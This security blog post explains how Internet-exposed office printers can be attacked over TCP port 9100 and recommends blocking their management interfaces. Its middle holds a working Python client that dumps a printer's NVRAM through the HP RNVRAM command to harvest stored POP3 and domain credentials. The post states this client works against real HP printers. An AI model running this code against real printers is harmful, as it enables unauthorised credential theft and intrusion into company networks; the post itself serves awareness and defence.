Over the past couple of months, a lot has been written about the Mirai botnet and the vulnerable Internet-connected devices it targeted. Based on the credential list embedded in its code, we can see that the targets were diverse: IP cameras, DVRs, TV receivers, routers and printers. Printers? Yes, printers. Over the years these devices have turned into full, multi-functional servers, often including an embedded web server for administration. What many companies don't realize is that these functions, once reachable from the Internet, effectively open a back door into the company network.
Back in 2007, during Red Team exercises, we were using a tool called 'Hijetter', developed by the hacker group Phenoelit.
By connecting to the printer's JetDirect interface over TCP port 9100, one could retrieve its configuration settings. What we used most, however, was the ability to upload files. By uploading a custom port scanner written in Java, one could turn the printer into a scanning device and bypass network whitelisting in many cases, especially since nobody expects a printer to attack the internal network.
There are many ways to attack a printer, but in my humble opinion the two biggest are using it as a gateway into a company's network and dumping its memory in order to obtain credentials.
In 2014, the security world was shaken up by the disclosure of the 'Heartbleed' vulnerability in the OpenSSL cryptographic library. By executing the exploit, an attacker could read chunks of the target process's memory and obtain credentials without leaving a trace.
A comparable attack, reading stored memory to harvest credentials, can be executed against internal printers that are reachable from the Internet.
But how exactly can this be done? As part of his master's thesis, Jens Müller researched the security of printers and how to hack them. Besides a detailed paper and website, he created a tool called 'PRET', the "Printer Exploitation Toolkit".
Once a connection is established, the toolkit can issue a wide range of commands to the printer (each command is well documented on its GitHub page).
It is always interesting to look at the printer's configuration. The printer in our example has no password set, which means everyone inside the company, and anyone on the outside, can connect to it and reconfigure it.
The many options threat actors have for gathering information are concerning, such as searching for other printers on the network via SNMP, but the 'nvram' option in particular caught my attention. NVRAM (non-volatile RAM, usually implemented as flash or EEPROM) holds the printer's long-term settings. With 'nvram dump', a threat actor can copy the entire contents of the printer's NVRAM and read whatever credentials are stored there, such as POP3 or domain credentials.
Here’s an example of executing this command:
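To show what actually crosses the wire on port 9100 for both the JetDirect connection mentioned earlier and the 'nvram dump' command, here is an added example (not code from the original post and not PRET's code). It implements a minimal PJL client and, so that it runs offline, a fake printer. The '@PJL INFO ID' command is standard PJL; 'RNVRAM ADDRESS=n' is the undocumented HP extension PRET drives for its NVRAM dump. The fake printer's NVRAM contents, its reply layout and the 'DATA=' parsing are constructed assumptions for this example; real printers differ by model.

```python
"""Added example: minimal PJL client for TCP/9100 plus a fake printer.

Not PRET's code. '@PJL INFO' is standard PJL; 'RNVRAM' is the undocumented
HP extension that PRET's 'nvram dump' relies on. The fake printer, its NVRAM
contents and the exact reply layout are constructed for this example.
"""
import re
import socket
import threading

UEL = b"\x1b%-12345X"   # Universal Exit Language sequence framing a PJL job
FF = b"\x0c"            # PJL terminates every reply with a form feed


def pjl_request(sock, command, timeout=3.0):
    """Send one PJL command and return the printer's reply as text."""
    sock.sendall(UEL + b"@PJL " + command.encode("ascii") + b"\r\n" + UEL)
    sock.settimeout(timeout)
    chunks = []
    try:
        while True:
            data = sock.recv(4096)
            if not data:
                break
            chunks.append(data)
            if FF in data:          # end of this reply
                break
    except socket.timeout:          # printer that never answers (common)
        pass
    return b"".join(chunks).replace(FF, b"").decode("ascii", "replace")


def parse_rnvram(reply):
    """Byte value from an RNVRAM reply, or None when no DATA field came back."""
    m = re.search(r"DATA\s*=\s*(\d+)", reply)
    return int(m.group(1)) if m else None


def nvram_dump(sock, max_len=4096):
    """Read NVRAM one byte per round trip, the way PRET's 'nvram dump' does,
    stopping at the first address the printer answers without DATA."""
    out = bytearray()
    for addr in range(max_len):
        val = parse_rnvram(pjl_request(sock, "RNVRAM ADDRESS=%d" % addr))
        if val is None:
            break
        out.append(val & 0xFF)
    return bytes(out)


def printable_strings(blob, min_len=4):
    """Pull runs of printable ASCII out of a dump, like the strings(1) tool;
    this is where POP3/LDAP credentials tend to show up."""
    return [s.decode() for s in re.findall(rb"[\x20-\x7e]{%d,}" % min_len, blob)]


# Constructed NVRAM image; real layouts are model specific and undocumented.
FAKE_NVRAM = (b"\x00\x01CFG\x00pop3user=scanner@corp.example\x00"
              b"pop3pass=Winter2016!\x00ldap=CN=svc_print,DC=corp\x00\x00\x00")


def fake_printer_reply(command):
    """Answer the few PJL commands this example uses (constructed behaviour)."""
    if command == "INFO ID":
        return b'@PJL INFO ID\r\n"FAKE LaserJet (constructed)"\r\n' + FF
    m = re.match(r"RNVRAM ADDRESS=(\d+)$", command)
    if m:
        addr = int(m.group(1))
        reply = b"@PJL RNVRAM ADDRESS=%d\r\n" % addr
        if addr < len(FAKE_NVRAM):
            reply += b"DATA=%d\r\n" % FAKE_NVRAM[addr]
        return reply + FF               # out of range: no DATA line at all
    return FF                           # unknown command: reply empty, don't hang


def start_fake_printer():
    """Listen on 127.0.0.1 at an ephemeral port in a thread; return the port."""
    srv = socket.socket()
    srv.bind(("127.0.0.1", 0))
    srv.listen(1)

    def serve():
        conn, _ = srv.accept()
        with conn:
            buf = b""
            while True:
                data = conn.recv(4096)
                if not data:
                    break
                buf += data
                parts = buf.split(UEL)
                buf = parts.pop()           # possibly incomplete trailing piece
                for part in parts:
                    line = part.strip()
                    if line.startswith(b"@PJL "):
                        conn.sendall(fake_printer_reply(line[5:].decode()))
        srv.close()

    threading.Thread(target=serve, daemon=True).start()
    return srv.getsockname()[1]


def demo():
    """Run the whole exchange end to end against the fake printer."""
    port = start_fake_printer()
    with socket.create_connection(("127.0.0.1", port)) as s:
        ident = pjl_request(s, "INFO ID")       # reconnaissance: which model?
        blob = nvram_dump(s)                    # then pull NVRAM
    return {"id": ident, "nvram": blob, "strings": printable_strings(blob)}


if __name__ == "__main__":
    result = demo()
    print(result["id"].strip())
    for s in result["strings"]:
        print("  ", s)
```

Point `socket.create_connection` at a real HP printer instead of the fake one and the same client works, but note that RNVRAM is HP-specific, answers differ per model, and many devices simply stay silent (hence the timeout). The example only reads; the matching WNVRAM write, which PRET also supports, is the operation that can wear out or corrupt NVRAM, so keep it out of any engagement without explicit permission.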
To get an idea of how widespread this attack could be, we used the search engine Shodan and looked for a particular combination of brand and model that we knew to be vulnerable to it.
Searching for the 'multifunction' versions of two brands in particular resulted in over 5,000 hits, located in the USA, South Korea, Australia, Japan, Germany and Canada. In two cases, a TV broadcast station and a university in the US, a whole range of printers was connected directly to the Internet. Both institutions were exposed: their printers could be attacked and controlled remotely without leaving a trace.
We also found several issues in the PostScript (PS) and PJL printer languages, including scenarios that could cause physical damage to the printer. You heard correctly. NVRAM tolerates only a limited number of write cycles, so by repeatedly overwriting values in it an attacker can wear the memory out until the printer no longer works properly.
It is important to remember that when adversaries launch a targeted attack against a company, the first phase is reconnaissance. After evaluating the information they have gathered, they select a method of penetration with the goal of establishing a beachhead from which to infiltrate the target's network. A printer exposed to the Internet hands them that beachhead, and they can operate from it undetected.
With this in mind, companies need to start asking themselves what would justify connecting printers to the Internet and what risks that entails, from both an external and an internal connection perspective. At a minimum, nothing should route from the Internet to the printer's management interfaces (TCP port 9100, the embedded web server, SNMP), and internally those ports should be reachable only from the print servers and administrators that need them. So, the moral of the story: adequate (but workable) security measures should be taken to limit the possibility of misusing the printer.